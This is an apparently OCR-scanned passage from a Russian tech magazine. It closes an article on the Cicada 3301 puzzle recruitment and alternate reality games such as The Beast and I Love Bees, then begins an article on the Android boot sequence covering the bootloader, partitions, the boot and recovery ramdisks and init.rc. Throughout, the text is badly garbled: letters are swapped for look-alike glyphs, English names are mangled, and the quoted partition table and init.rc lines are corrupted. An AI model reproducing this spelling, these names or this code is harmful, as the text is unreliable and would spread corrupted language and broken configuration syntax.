уничтожала текст после первого же прочтени^ (впрочем, сеичас «Агриппа» доступна 
на саите Гибсона). 

Будв Әрикссон одинок в своих изыскани^х, он бы зашел в тупик намного ранвше. 
Но через несколвко днеи после того, как к нему в руки попала изначалвна^ картинка, 
он обнаружил, что по следу идут еиде тыс^чи криптоаналитиков-лкзбителеи и обме- 
нивакзтс^ решени^ми на4сһап и другихфорумах. В частности, силами коллективного 
разума расшифровка подсказки из валлиискои новеллы была получена за считаные 
часы. 

Далвше стало еиде интереснее. Очередное сообидение содержало призыв позво- 
нитв на телефонныи номер, зарегистрированныи в Техасе. Позвонившие смогли ус- 
лышатв записв на автоответчике, где синтетическии голос подсказывал наити еиде 
одно простое число в изначалвнои картинке. Число было наидено, и оно указывало 
на саит 845145127. сот (с тех пор он перестал работатв и, по всеи видимости, был 
кем-то захвачен). 

На саите располагалосв изображение .дикады и счетчик, показывакзидии обратныи 
отсчет. Когда _дифры дошли до нул^, вместо них по^вилосв 14 координат ӨР5, указы- 
вакзидих на точки в Париже, Сиднее, Сеуле, Варшаве, Сизтле, Аризоне, Калифорнии, 
Новом Орлеане, Маиами и на Гаваи^х. Живуидие неподалеку доброволыды нашлисв 
без труда, и уже скоро на руках у сообидества оказаласв подборка фотографии по- 
стеров с ОВ-кодами. В әтот момент отпали последние сомнени^ в том, что «1Дика- 
да» — әто не шутка криптографа-одиночки: организоватв все әто, не име^ команды 
хот^ бы из несколвких человек, было бы просто невозможно. 



Постер «1Дикады» 
в Варшаве 





При том что некоторые задани^ невозможно было выполнитв, не прибега^ к по- 
моши сообшества, посты с форумов не всегда помогали идти по следу «1Дикады». 
Так, некто с никнеимом \Л/Јпс! (^кобы девушка из штата Мичиган) на прот^жении неко- 
торого времени нарочно пыталс^ навести других на ложныи след. Причины тому мо- 
гут бытв разные. Не исклкзчено, что \Л/тс! хотел (или хотела) сбитв с толку конкурен- 
тов, чтобы в одиночку разгадатв все. Возможно и то, что зто был кто-то из «1Дикады» 
и он пыталс^ снизитв продуктивноств коллективнои работы. 

В другои раз некто выложил на РазЈеот послание, где написал, что ^вл^етс^ 
әкс-членом «1Дикады» и никому не советует в нее вступатв. ^кобы «1Дикада» — әто 
религиозна^ организаии^, замаскированна^ под научнукз, и в неи состо^т сервезные 
лкзди с плохими намерени^ми: бывшие военные, дипломаты и академики, не удов- 
летворенные нынешним мировым пор^дком. По словам анонимного автора, их 
|делв — преобразоватв человечество в нии,шеанских уберменшеи. «Әто опасна^ ор- 
ганизаии^, и их методы гнусны», — закончил он свое послание. 

Поиски тем временем были близки к поворотнои точке. Сообшение, полученное 
из собранных по всему миру ОВ-кодов, вело на саит в сети Тог. Неизвестно, что уви- 
дели первые его посетители, но всех осталвныхждало лишв сообшение «Нам нужны 
лучшие, а не последователи». Говор^т, что несколвко избранных получили әлектрон- 
ные писвма, ^кобы с приглашением разгадатв еше несколвко загадок в приватном 
режиме. Джоәлв Әрикссон, как можно догадатвс^, в их список не попал и, веро^т- 
но, именно потому с такои легкостыо стал даватв интервыо газетам. «Если бы мои 
|дикл сна был чутв другим, п, возможно, оказалс^ бы среди первых», — пожаловалс^ 
он в интервыо Тһе Те1едгарһ. Что ж, проспал так проспал! 

Через несколвко неделв от «1Дикады» поступило новое сообшение. Оно по^вилосв 
на форуме ВесШ и гласило: «Привет. Мы нашли тех индивидов, что искали. Наш путв 
дпинои в мес^и, закончен. Покачто». Последовавша^ пауза дпиласһодиннаддатв ме- 
с^|дев и была прервана 4 ^нвар^ 2013 года публикаи,иеи новои картинки с текстом: 
«Приветствуем снова! Наш поискумных лкздеи продолжаетс^». 

И оп^тв все завертелосв по привычнои программе. В картинке было скрыто сти- 
хотворение из «Книги закона», написаннои в начале двадиатого века оккулвтистом 
и самопровозглашенным магом Алистером Кроули; книга помогла наити ссылку 
на 130-мегабаитныи фаил, состо^шии из простых чисел; далее последовал фаил 
в формате МРЗ с неизвестнои песнеи, предвар^емои пением |дикад. Там разыска- 
ли ссылку на аккаунт в ТМНег, которыи публиковал на первыи взгл^д случаиные 
числа. Они, в свокз очередв, оказалисв совершенно не случаиными и содержали 
код на основе гематрии — каббалистического способа изыскиватв таиныи смысл 
в словах, толвко вместо иврита исполызовалисв англосаксонские руны. 

Последние шаги оказалисв оченв похожими на то. что было год назад: ссылка 



на саит в сети Тог с координатами семи точек, в том числе в Москве и Окинаве (^по- 
ни^). На әтом след снова оборвалс^: горстку первых соискателеи пропустили в при- 
ватнукз фазу, осталвные осталисв не у дел. По слухам, приватна^ частв начиналасв 
с теста личностных характеристик по схеме, схожеи с системои Маиерс — Бриггс. 

В ^нваре зтого года обБ^вление «1Дикады» снова по^вилосв — на әтот раз в том 
же твиттере, где до зтого публиковали зашифрованные строки. И следом — нова^ 
череда шифров, и,итат из книг, рунических надписеи и прочих головоломок. Финал 
на момент выхода зтого номера вр^д ли будет достигнут, но и на зтот раз едва ли 
«1Дикада» выдаст себ^ и позволит узнатв, что же ждет кандидатов после окончани^ 
тестов. 

ИСКУССТВЕННЫИ РАЗУМ, ПЧЕЛЫ 
И АЛЫЕРНАТИВНАЛ РЕАЛВНОСТВ 

Загадки «1Дикады» уникалвны в своеи сложности, но методы, избранные таинои груп- 
пои, оченв напоминакгг феномен, попул^рныи в начале двухтыс^чных годов. Он на- 
зываетс^ А11егпа1е ВеаИгу Өатез (АВӨ) — игры в алвтернативнукз реалвноств. Смысл 
әтих игр сводитс^ к тому, что участники получакзт некие шифрованные задани^ через 
интернет и, деиству^ сообшд, раскрывакгг следукзидие подсказки и кусочки скзжета. 

Первои из таких игр была Тһе Веаз! — ее придумали в 2001 году в МјсгозоТт, чтобы 
прорекламироватв выходившии тогда на әкраны филвм Стивена Спилберга «Искус- 
ственныи разум». Начиналасв игра с подсказок, разбросанных в треилерах и посте- 
рах филвма. Так, в треилере был спр^тан телефонныи номер — позвонив по нему, 
можно было прослушатв записв с инструкиЈ/тми. Выполнение инструки,ии позвол^ло 
получитв некое послание по әлектроннои почте, содержашее очередные подсказки. 




Так игроки вышли на несколвко саитов, «владелыды» которых ^вно жили не в 2001 



году, а в Изуча^ зти страншды, участники фактически могли вести расследо- 

вание убииства. Перед ними постепенно вырисовываласв картина мира будуидего, 
где антиробомилии,и^ сражаласв с Коалии,иеи за свободу роботов, а убиии,еи ока- 
залс^ искусственныи интеллект, управл^вшии умным домом. Что ж, жертве не по- 
везло: нечего было измен^тв родному дому с секс-ботом! 

Тһе Веаз! дпиласв всего около трех мес^иев, и кони,овкои, как несложно дога- 
датвс^, стала премвера «Искусственного разума». Играуспела наделатв много шума: 
ничего подобного до тех пор никогда не было, и о рекламном фокусе МјсгозоТС мно- 
го писали и говорили. Желакзидие повторитв успех не заставили себ^ ждатв, и «игры 
в алвтернативнукз реалвноств» вошли в моду. 

Тем временем разработчики, сто^вшие за Тһе Веаз!, отделилисв от МЈсгозоТ!: 
и образовали студикз 42 Еп1ег1аттеп1, где создали еиде несколвко коммерческих 
АВӨ. Сама^ знаменита^ из них (да и среди АВӨ вообиде) была сделана по очередно- 
му заказу МЈсгозоТТ, а если точнее — микрософтовскои студии Випдје. К выходу гото- 
виласв игра На1о 2, и она нуждаласв в әффективнои рекламе. Именно с зтои и,елыо 
была разработана нова^ АВӨ — 1 1_оуе Веез («^ лкзблкз пчел»). 
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Сеичас саит Поүеоеез.сот отсчитывает времл до грлдуидего ин1дидента 



Зав^зка на зтот раз оказаласв еиде более интригукзидеи. Некоторым бывшим 
участникам Тһе Веаз! по почте были отправлены банки с медом. На крышках банок — 
разбросанные в случаином пор^дке буквы, складывакзидиес^ в слова «1 1_оуе Веез». Те 



же слова, но уже в виде адреса веб-страншды Ноуеоеез.сопл по^вилисв спуст^ пару 
днеи в телерекламе На1о 2. 

С әтого момента и началасв игра. Саит, на которыи указывала реклама, был посв^- 
иден пчеловодству, но тут и там на нем попадалисв кусочки странных изображении. 
Затем был наиден блог автора саита, где онажаловаласв на взлом. Через несколвко 
днеи р^дом с иеннои информаи,иеи о пчелах на саите по^вилс^ список геолокаи,ии, 
напротив каждои из которых сто^ло врем^. Участники игры пришли в обозначен- 
ные места и обнаружили таксофонные будки, из которых в указанныи час раздалисв 
звонки. Те, кто не побо^лс^ вз^тв трубку, услышали оборванные кусочки записеи ди- 
алогов. 

1 1_оуе Веез оказаласв своего рода радиопостановкои, но разбитои на мелкие ча- 
сти, услышатв которые можно было, лишв наход^ нужныи таксофон и называ^ оче- 
редное кодовое слово в ответ на вопрос, донос^идиис^ из трубки. Складыва^ услы- 
шанные тридиатисекундные обрывки в |делые диалоги, игроки обнаружили скзжет, 
напоминакзидии фантастическии сериал. Шеств основных персонажеи, живуших 
в 2552 году, готовилисв к воине с пришелыдами, и толвко вмешателвство из прошло- 
го могло помочв им победитв. 

Игроки с готовностыо решали головоломки, обходили таксофоны и караулили 
звонки — известен случаи, когда человек дождалс^ звонка, несмотр^ на начинавшии- 
с^ ураган. Но насто^идим призом длл них была возможноств пообшдтыз^ с живыми 
актерами. Иногда вместо прослушивани^ записанного разговора игрок мог сам статв 
участником повествовани^, и зто, по рассказам очевидиев, давало ни с чем не срав- 
нимые ошуидени^: будто скжет деиствителвно раскрываетс^ вокруг теб^. 

Хотв разработчики игры и не про^вл^ли себ^, ни у кого не было сомнении, что за I 
1_оуе Веез стоит МјсгозоТ!: и развлечение в конечном счете призвано что-то реклами- 
роватв: изначалвна^ ссылка на Ноуеоеез.сопл в треилере На1о 2 даже недвусмыслен- 
но намекала, что именно. Әто, впрочем, не смуидало игроков. 

В середине двухтыс^чных казалосв, что подобные игры имекгг болвшое будуидее: 
одновременно шло по несколвко АВӨ, и авторы наиболее успешных считали себ^ 
корол^ми новои индустрии. Телестудии одна за другои задумывалисв над тем, что- 
бы сопроводитв очереднои сериал игрои в алвтернативнукз реалвноств: в частности, 
при помоиди АРӨ рекламировалисв «Остатвс^ вживых» и «Герои». 

В 2007 году студи^ 42 Еп1ег1аЈптеп1: успешно выполнила сразу несколвко важных 
заказов. Игра Уатзгппд Ројп^ рекламировала \Л/Јпс!о\л/5 УЈзЈа и вклкзчала в себ^ шоу 
в Лас-Вегасе и безумно дорогие призы вроде путевки в космос. Еш,е одна игра про- 
двигала алвбом Үеаг 2его группы 1\Ппе 1псһ ЫаПз — подсказки к неи были записаны 
на флеш-карты, которые организаторы подкладывали в туалеты на кони,ертах, а еиде 
игроки должны были рисоватв граффити в поддержку алвбома. Одним из главных 
успехов студии стала игра\/\/һу 5о Зепоиз, св^занна^ с филвмом «Темныи рвидарв»: 
в неи участвовали миллионы игроков в 177 странах и даже устраивали псевдодемон- 
страи,ии в поддержку Харви Дента — мәра города, которыи заидиидает Бәтмен. 

То были золотые денвки АРӨ, но уже тогда начали по^вл^твс^ признаки гр^ду- 
шего кризиса жанра. Клкзчевые сотрудники 42 ЕпЈеПаЈптепЈ один за другим поки- 
дали компаникз, и, хотһ никто не об^^вл^л, что «АВӨ мертвы», уже через пару лет 
активноств пошла на спад. О причинах әтого можно толвко догадыватвс^: то ли вы- 
бор доступныхтворческих приемов оказалс^ неболвшим и быстро исчерпалс^, то ли 



игрокам наскучило ооеспечиватв оесплатнук) поддержку очередному оренду, то ли 
еиде что-то. С уверенностыо можно сказатв одно: вместо будуидего развлекателвнои 
индустрии игры в алвтернативнукз реалвноств оказалисв мимолетнои модои. 

КТО СТОИТ ЗА «ЧИКАДОИ»? 

У загадок «1Дикады» много обидего с АВӨ: головоломки, телефонные звонки, охота 
на ОВ-коды. Но еств и прини,ипиалһные отличи^: полное отсутствие информаи,ии 
о том, кто стоит за «игрои», и толвко намек на и,елв. Суидествует распространенна^ 
догадка о том, что «1Дикада» — зто әлитна^ хакерска^ группа, однако на самом деле 
пр^татвс^ за әтим названием может кто угодно. 

Иногда к подобным методам набора прибегакзт спеислужбы. Әтим, в частности, 
известна британска^ разведка: еиде во времена Второи мировои воины кандида- 
тов дл^ Правителвственнои школы кодов и шифров искали при помоиди кроссвор- 
дов, публикуемых в газете. Да и сеичас подобна^ практика прои,ветает. Школа кодов 
и шифров теперв переименована в 1Дентр правителвственнои св^зи (ӨСНО), вместо 
кроссвордов исполвзуетс^ интернет, но в и,елом сутв измениласв не силвно. В сен- 
т^бре прошлого года на саите ӨСНО опубликовали приглашение на работу и при- 
ложили шифрованное послание дл^ претендентов. Те, кто решил серикз непростых 
криптографическихзадач, могли устроитвс^ на одну из засекреченных должностеи. 
Нечто подобное в 2010 году делали и в ВВС США: там придумали спр^татв шифров- 
ку в свои логотип. 

Не может ли за «1Дикадои» скрыватвс^ гениалвно обставленное предложение 
о наиме в 1ДРУ, АНБ, М16, Моссад или в одну из подобных организаи,ии? Такои ва- 
риант исклкзчатв нелыз^, но до сих пор государственные службы, даже если и при- 
мен^ли дгт наима практические задани^, все же предпочитали делатв әто на своих 
саитах, а не через 4сһап. 
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Задачка 6СН0 



Пока что «1Дикаду» можно считатв аналогом АВӨ, причем таким, что «Пчелы» 
и прочие массовые развлечени^ дес^тилетнеи давности кажутс^ детским лепетом. 
И дело не толвко в особеннои сложности и увлекателвности загадок. Возможно, даже 
не в том, что организаторы оградили себ^ завесои таины, заггтнутв за которукз так 
мечтакзт претенденты. Путв к «1Дикаде» обладает всеми признаками игры, но при зтом 
игрои не ^вл^етс^. А насто^идие таины и приклкзчени^, как известно, ман^т куда болв- 
ше, чем выдуманные. 



Төбл никогда нө интересовало, как работакзт 1аз1һоо1 или 
АӘВ? Или почему смартфон под управлением АпсЈгснс! 
практически невозможно превратитв в кирпич? Или, мо- 
жет бытв, ты давно хотел узнатв, где кроетсл магил фреи- 
мворка Хрозес! и зачем нужны загрузочные скрипты / 
зуз1ет/е1с/1пИ.с1? А как насчет консоли восстановленил 
(гесоуегу)? Әто частв АпсЈгснс! или веш,һ в себе и почему 
длл установки стороннеи прошивки обычныи рекавери 
не подходит? Ответы на все әти и многие другие вопросы 
ты наидешв в даннои статве. 



КАК РАБОТАЕТ АЫОП010 

Узнатв о скрытых возможност^х программных систем можно, пон^в прини,ип их рабо- 
ты. В некоторых случа^х сделатв әто затруднителвно, так как код системы может бытв 
закрыт, но в случае Апс!гоЈс1 мы можем изучитв вскз систему вдолв и поперек. В зтои 
статве п не буду рассказыватв обо всех нкзансах работы Апс!гоЈс1 и остановлкзсв толв- 
ко на том, как происходит запуск ОС и какие событи^ имекзт место бытв в промежутке 
между нажатием кнопки питани^ и по^влением рабочего стола. 

Попутно ^ буду по^сн^тв, что мы можем изменитв в әтои иепочке событии и как раз- 
работчики кастомных прошивок исполызукзт әти возможности дгт реализаиии таких 
веш,еи, какткзнинг параметров ОС, расширение пространства дгт хранени^ прило- 
жении, подклкзчение 5\л/ар, различных кастомизаиии и многого другого. Вскз әту ин- 
формаиикз можно исполызоватв дгт создани^ собственных прошивок и реализаиии 
различныххаков и модификаиии. 

ШАГ ПЕРВЫИ. 1Ј-ВООТ И ТАБЛИ1ЈА РАЗДЕЛОВ 

Все начинаетс^ с первичного загрузчика. После вклкзчени^ питани^ система испол- 
н^ет код загрузчика, записанного в посто^ннукз пам^тв устроиства. Чаше всего его 
ролв выполн^ет модифииированна^ верси^ загрузчика и-ооот. со встроеннои под- 
держкои протокола Таз1:ооо1:, но производителв мобилвного чипа или смартфона/ 
планшета имеет право выбратв и лкзбои другои загрузчик на его вкус. Например, 
компани^ Восксһјр исполызует собственныи, несовместимыи с ТазШоот загрузчик, и 
дгт его перепрограммировани^ и управлени^ им приходитс^ исполызоватв пропри- 
етарные инструменты. 

Протокол тазтооот, в свокз очередв, представл^ет собои систему управлени^ 
загрузчиком с ПК, котора^ позвол^ет выполн^тв такие деистви^, как разлочка за- 
грузчика, прошивка нового ^дра и гесоуегу, установка прошивки и многие дру- 
гие. Смысл сушествовани^ Таз1:ооо1: в том, чтобы иметв возможноств восстановитв 
смартфон в началвное состо^ние в ситуаиии, когда все осталвные средства не ра- 
ботакзт. ҒазТоооТ останетс^ на месте, даже если в резулвтате әкспериментов ты со- 
трешв со смартфона все содержимое всех разделов ЫАЫО-пам^ти, потер^в доступ 
и к Апс!гоЈс1, и к гесоуегу. 




Получив управление, и-оооТ провер^ет таблииу разделов и передает управле- 
ние ^дру, прошитому в раздел с именем оооТ, после чего ^дро извлекает в пам^тв 
ВАМ-образ из того же раздела и начинает загрузку либо Апс!гојс1, либо консоли вос- 
становлени^. ЫАЫО-пам^тв в Апс!гоЈс1-устроиствах поделена на шеств условно об^- 
зателвных разделов: 

ооо1: — содержит ^дро и ПАМ-диск, обычно имеет размер 

в раионе 16 Мб; 

гесоуегу — консолв восстановлени^, состоит из ^дра, набора 
консолвных приложении и фаила настроек, размер 16 Мб; 
• 5уз1:ет — содержит АгкЈгоЈа 1 , в современных деваисах имеет 
размер не менее 1 Гб; 

сасһе — предназначен дгт хранени^ кешированных данных, 
также исполызуетс^ дгт сохранени^ прошивки в ходе ОТА-об- 
новлени^ и поәтому имеет размер, сходныи с размерами раз- 
дела зузЈет; 

и5егс!ат.а — содержит настроики, приложени^ и данные полв- 
зовател^, ему отводитс^ все оставшеес^ пространство 
ЫАЫО-пам^ти; 

тјзс — содержит флаг, определ^кзидии, в каком режиме долж- 
на грузитвс^ система: АпсЈгоЈс! или гесоүегу. 



шғо 



Втерминологии Ыпих 

ВАМ-диск - зто своего 
рода виртуалһныи жест- 
кии диск, суидествук)1дии 

толһковоперативнои 
памити. На раннем зтапе 
загрузки идро извлекает 
содержимое диска из об- 

раза и подкл кзчает его 
как корневукз фаиловукз 
систему(гооИз). 



Кроме них, также могут суидествоватв и другие разделы, однако обидаи разметка 
определ^етс^ еиде на әтапе проектировани^ смартфона и в случае и-ооот. зашива- 
етс^ в код загрузчика. Әто значит, что: 1 ) таблииу разделов нелыз^ убитв, так как ее 
всегда можно восстановитв с помоидыо команды Тазт,ооот, оет Тогплат.; 2) дл^ изме- 
нени^ табли1ды разделов придетс^ разлочитв и перепрошитв загрузчик с новыми 
параметрами. Из зтого правила, однако, бывакзт исклкзчени^. Например, загрузчик 
того же Восксһјр хранит информаиикз о разделах в первом блоке ЫАЫО-пам^ти, так 
что дгт ее изменени^ перепрошивка загрузчика не нужна. 

Особенно интересен раздел пгпзс. Суидествует предположение, что изначалвно 
он был создан дл^ хранени^ различных настроек независимо от основнои системы, 
но в данныи момент исполвзуетс^ толвко дгт однои |дели: указатв загрузчику, из ка- 
кого раздела нужно грузитв систему — ооот. или гесоуегу. Әту возможноств, в частно- 
сти, исполвзует приложение ВОМ Мападег дгт автоматическои перезагрузки систе- 
мы в гесоуегу с автоматическои же установкои прошивки. На ее же основе построен 
механизм двоинои загрузки 11оипт.и Тоисһ, котора^ прошивает загрузчик 11оипт.и 
в гесоуегу и позвол^ет управл^тв тем, какукз систему грузитв в следукзидии раз. Стер 
раздел пгпзс — загружаетс^ Апс!гојс1, заполнил данными — загружаетс^ гесоуегу... 
то еств 11оипт.и Тоисһ. 



з^аИс з1гис1: рагИИоп рагИПопзП - { 
{ "-", 128 }, 
{ "х^асЈег", 128 }, 
{ "һоо1:1оагЈег" , 256 } , 

/* "пизс" рагПИоп 15 геди1гес1 Ғог гесоуегу */ 

{ "пизс", 12В }, 



{ "еГз", 16384 }, 

{ "гесоуегу", 8*1024 }, 

{ "һоо*", 8*1024 }, 

{ "зуз^ет" , 512*1024 }, 

{ "сасһе", 256*1824 }, 

{ "изегс^а" , 0}, 

{ 0, 0 }, 

}Ј 

Частв кода загрузчика, определжоша^ таблиду разделов 
ШАГ ВТОРОИ. РАЗДЕЛ ВООТ 

Если в разделе пгпзс не стоит флаг загрузки в гесоуегу, и-ооот передает управление 
коду, расположенному в разделе ооот. Әто не что иное, как ^дро Ыпих; оно находит- 
с^ в начале раздела, а сразу за ним следует упакованныи с помоидыо архиваторов 
срјо и дгјр образ ВАМ-диска, содержаидии необходимые дгт работы АпсЈгоЈс! катало- 
ги, систему инии,иализаи,ии јгит и другие инструменты. Никакои фаиловои системы 
на разделе ооот нет, ^дро и ВАМ-диск просто следукзт друг за другом. Содержимое 
ВАМ-диска такое: 

сЈата — каталог дгт монтировани^ одноименного раздела; 

• сЈеү — фаилы устроиств; 

ргос — свда монтируетс^ ргостз; 

• зЫп — набор подсобных утилит и демонов (асЈосЈ, например); 
гез — набор изображении дгт сһагдег (см. ниже); 

• зуз — скзда монтируетс^ зузтз; 

• зузтет — каталог дгт монтировани^ системного раздела; 
сһагдег — приложение дгт отображени^ проиесса зар^дки; 
оиНсЈ.ргор — системные настроики; 

ЈпЈт — система иниииализаиии; 

јпјт.гс — настроики системы иниииализаиии; 

иеүептсЈ.гс — настроики демона иүептсЈ, вход^идего в состав јпјт. 

Әто, если можно так выразитвс^, скелет системы: набор каталогов дгт подклкзче- 
ни^ фаиловых систем из разделов ЫАЫО-пам^ти и система ини1диализаи,ии, кото- 
ра^ заиметс^ всеи осталвнои работои по загрузке системы. 1Дентралвныи әлемент 
здесв — приложение тһ: и его конфиг јтт.гс, о которых во всех подробност^х п рас- 
скажу позже. А пока хочу обратитв внимание на фаилы сһагдег и иеуептсЈ.гс, а также 
каталоги зЫп, ргос и зуз. 

Фаил сһагдег — әто неболвшое приложение, единственна^ задача которого в том, 
чтобы вывести на әкран значок батареи. Он не имеет никакого отношени^ к АпсЈгоЈс! 
и исполвзуетс^ тогда, когда устроиство подклкзчаетс^ к зар^днику в выклкзченном 
состо^нии. В зтом случае загрузки АпсЈгоЈс! не происходит, а система просто загру- 
жает ^дро, подклкзчает ВАМ-диск и запускает сһагдег. Последнии выводит на әкран 
иконку батареи, изображение которои во всех возможных состо^ни^х хранитс^ 
в обычных РЫӨ-фаилах внутри каталога гез. 



Фаил иеуепЈсЈ.гс представл^ет собои конфиг, определ^кзидии, какие фаилы 
устроиств в каталоге зуз должны бытв созданы на зтапе загрузки системы. В ос- 
нованных на ^дре Ыпих системах доступ к железу осуидествл^етс^ через спеи,иалв- 
ные фаилы внутри каталога с!еу, а за их создание в АпсЈгоЈс! отвечает демон иеуепШ, 
^вл^кзидиис^ частыо јгит.. В нормалвнои ситуаи,ии он работает 
в автоматическом режиме, принима^ команды на создание 
фаилов от ^дра, но некоторые фаилы необходимо создаватв 
самосто^телвно. Они перечислены в иеуепШ.гс. 

Каталог зЫп в стоковом АпсЈгоЈс! обычно не содержит ниче- 
го, кроме асЈос!, то еств демона АОВ, которыи отвечает за от- 
ладку системы с ПК. Он запускаетс^ на раннем әтапе загрузки 
ОС и позвол^ет ввтвитв возможные проблемы на әтапе ини- 
и,иализаи,ии ОС. В кастомных прошивках в әтом каталоге мож- 
но наити кучудругихфаилов, например плке2Т5, котора^ может 
потребоватвс^, если разделы необходимо переформатиро- 
ватв в ехт.3/4. Также модеры часто помеидакзт туда ВизуВох, 
с помоидыо которого можно вызватв сотни Ыпих-команд. 

Каталог ргос дл^ Ыпих стандартен, на следукзидих әтапах за- 
грузки Јпг1 подклкзчит к нему ргосТз, виртуалвнукз фаиловукз си- 
стему, котора^ предоставл^ет доступ к информаи,ии обо всех 
про1дессах системы. К каталогу зуз система подклкзчит зузТз, 
открывакзидукз доступ к информаи,ии о железе и его настроикам. 
С помоидвкз зузТз можно, например, отправитв устроиство в сон 
или изменитв исполвзуемыи алгоритм әнергосбережени^. 

Фаил оиИсЈ.ргор предназначен дгт хранени^ низкоуровне- 
вых настроек АпсЈгоЈсЈ. Позже система обнулит әти настроики 
и перезапишет их значени^ми из недоступного пока фаила 
зузТет/оиНсЈ.ргор. 
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Корневои раздел ТВ-приставки 011ҮА 




шғо 

В проиессе загрузки 
АпсЈгоЈсЈ отображает 
три разныхзагрузоч- 
ныхзкрана: первыи 
по^вллетс^ сразу 
после нажатил кноп- 
ки питани^ и прошит 
влдро Ыпих, второи 
отображаетси 
нараннихәтапах 
инии,иализаи,ии 
изаписан вфаил/ 
ЈпШодо.Ме (сегоднл 
почти неисполвзу- 
етсл), последнии 
запускаетс^ с по- 
моидыо приложени^ 
һоо1атта1Јоп и со- 
держитсл в фаиле 
/5уз1ет/тес1Ја/ 
һоо1апЈта1Јоп._Јр. 



оп е_г1у-1пИ 

# _е_ 1П 1 ± апс! Пз Гогке_ сһПсЈгеп^Б оот___ј. 
ыгНе /ргос/1/оот_ас1ј -15 

# 5е1 Т_һе зесигИу сопт.ех1 Ғог 1һе 1пН ргосезз. 

Ш ЈЫз 5һои1с1 оссиг һеГоге апу1һтд е1_е Се.д. иеиепЫ) 15 51_г1е_. 
_е!соп и:г : 1ги1 : _Ө 

V 5е1 т.һе зесигИу соп^Еех. оТ /асШ.кеуз 1Т ргезеп*. 
ге51огесоп /а_һ_кеу5 

з.агт. и_уепт._ 

В сгеа.е тоип1ро1п1_ 

тксһг /тпт. В775 гоо! зуз^ет 

# НПош зуз.ет II Ш 1о зе!ептогсе ап_ зе_ һоо1еапз. 
сһошп зуз^сеш 5у51ет /5еПпих/епт"огсе 

сһошп 5у5.ет 5у5Т.ет /5у5/т~5/5еПпих/епТогсе 

сһошп -I? 5у51ет 5у51ет /ве1 тих/һоо1е_п5 

сһошп -13 5у51вт 5уз1ет /5у5/Т5/5е Ппих/_оо1еап5 

сҺојјп зу5.ет 5узт.ет /5е1 Јпих/сотт.1_репс..пд_.оо1_ 
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Частв конфига тК.гс из СуаподепМос! 



ШАГ ВТОРОИ, АЛЫЕРНАТИВНЫИ. РАЗДЕЛ НЕСОУЕПҮ 

В том случае, если флаг загрузки гесоуегу в разделе пгнзс 
установлен или полвзователв вклкзчил смартфон сзажатои 
клавишеи уменвшени^ громкости, и-һоо. передаст управ- 
ление коду, расположенному в начале раздела гесоуегу. 
Как и раздел ооот., он содержит ^дро и РАМ-диск, которыи 
распаковываетс^ в пам^тв и становитс^ корнем фаиловои 
системы. Однако содержимое РАМ-диска здесв несколв- 
ко другое. 

В отличие от раздела ооот., выступакзидего в роли переходного звена между раз- 
ными зтапами загрузки ОС, раздел гесоуегу полностыо самодостаточен и содержит 
миниаткзрнукз операи,ионнукз систему, котора^ никак не св^зана с АпсЈгојо!. У гесоуегу 
свое ^дро, свои набор приложении (команд) и свои интерфеис, позвол^кзидии полв- 
зователкз активироватв служебные функиии. 

В стандартном (стоковом) гесоуегу таких функиии обычно всего три: установка 
подписанных клкзчом производител^ смартфона прошивок, ваип и перезагрузка. 
В модифииированных сторонних гесоуегу, таких как С1оск\л/огкМос! и "1ЛЛ/ВР, функ- 
и,ии гораздо болыие. Они умекзт форматироватв фаиловые системы, устанавливатв 
прошивки, подписанные лкзбыми клкзчами (читаи: кастомные), монтироватв фаило- 
вые системы на других разделах (в и,ел^х отладки ОС) и вклкзчакзт в себ^ поддержку 
скриптов, котора^ позвол^ет автоматизироватв проиесс прошивки и многие другие 
функиии. 

Спомош^кзскриптов, например, можносделатвтак, чтобыпослезагрузки гесоуегу 
автоматически нашел на карте пам^ти нужные прошивки, установил их и перезагру- 
зилс^ в АпгЈгојо!. Әта возможноств исполвзуетс^ инструментами ВОМ Мападег, аит.о- 
Иазһег, а также механизмом автоматического обновлени^ СуаподепМоо! и других 



прошивок. 

Кастомные рекавери также поддерживакзт скрипты бәкапа, располагакзидиес^ 
в каталоге /зуз1:ет/ас1с1оп.с1/. Перед прошивкои гесоуегу провер^ет наличие скриптов 
и выполн^ет их перед тем, как произвести прошивку. Благодар^ таким скриптам 
даррз не исчезакзт после установки новои версии прошивки. 

ШАГ ТРЕТИИ. ИНИЧИАЛИЗАЧИЛ 

Итак, получив управление, ^дро подклкзчает ВАМ-диск и по окончании инии,иализа- 
|дии всех своих подсистем и драиверов запускает проиесс \п\Х, с которого начинаетс^ 
ини1диализаи,и^ АпсЈгоЈо 1 . Как п уже говорил, у ЈпК еств конфигураиионныи фаил јпК.гс, 
из которого про1десс узнает о том, что конкретно он должен сделатв, чтобы подн^тв 
систему. В современных смартфонах әтот конфиг имеет внушителвнукз длину в не- 
сколвко сот строк и ктомуже снабжен прии,епом из несколвких дочерних конфигов, 
которые подклкзчакзтс^ к основному с помоидыо директивы јплрог!:. Тем не менее его 
формат достаточно простои и по сути представл^ет собои набор команд, разделен- 
ных на блоки. 

Каждыи блок определ^ет стадикз загрузки или, выража^св ^зыком разработчи- 
ков АпсЈгојо 1 , деиствие. Блоки отделены другот друга директивои оп, за которои сле- 
дует им^ деистви^, например оп еаМучпИ: или оп розМз. Блок команд будет выпол- 
нен толвко в том случае, если сработает одноименныи триггер. По мере загрузки 
ЈпИ: будет по очереди активироватв триггеры еаМучпК, \п\Х, еаг1у-Тз, Тз, розМз, еаг1у- 
ооо! и ооо1:, запуска^ таким образом соответствукзидие блоки команд. 

Если конфигураи,ионныи фаил т^нет за собои еиде несколвко конфигов, пере- 
численных в начале (а зто почти всегда так), то одноименные блоки команд внутри 
них будут обБединены с основным конфигом, так что при срабатывании тригге- 
ра 1гп1 выполнит команды из соответствукзидих блоков всех фаилов. Әто сделано 
дл^ удобства формировани^ конфигураиионных фаилов дл^ несколвких устроиств, 
когда основнои конфиг содержит обидие дл^ всех деваисов команды, а спеиифич- 
ные дл^ каждого устроиства записывакзтс^ в отделвные фаилы. 

Наиболее примечателвныи из дополнителвных конфигов носит им^ тЈ1тс.им^_ 
устроиства.гс, где им^ переменнои определ^етс^ автоматически на основе содер- 
жимого фаила го.һагс!\л/аге. Әто платформенно-зависимыи конфигураи,ионныи фаил, 
которыи содержит блоки команд, спеиифичные дл^ конкретного устроиства. Кроме 
команд, отвечакзидих за ткзнинг ^дра, он также содержит примерно такукз команду: 

шоип1:_а11 . /јз^әһ. имл_устроиства 

Она означает, что теперв ЈпК должен подклкзчитв все фаиловые системы, перечис- 
ленные в фаиле ./ТзЈао.им^устроиства, которыи имеет следукзидукз структуру: 

имл_устроиства_(раздела) точ ка_монтированил фаиловал_система отдии_фс <-> 
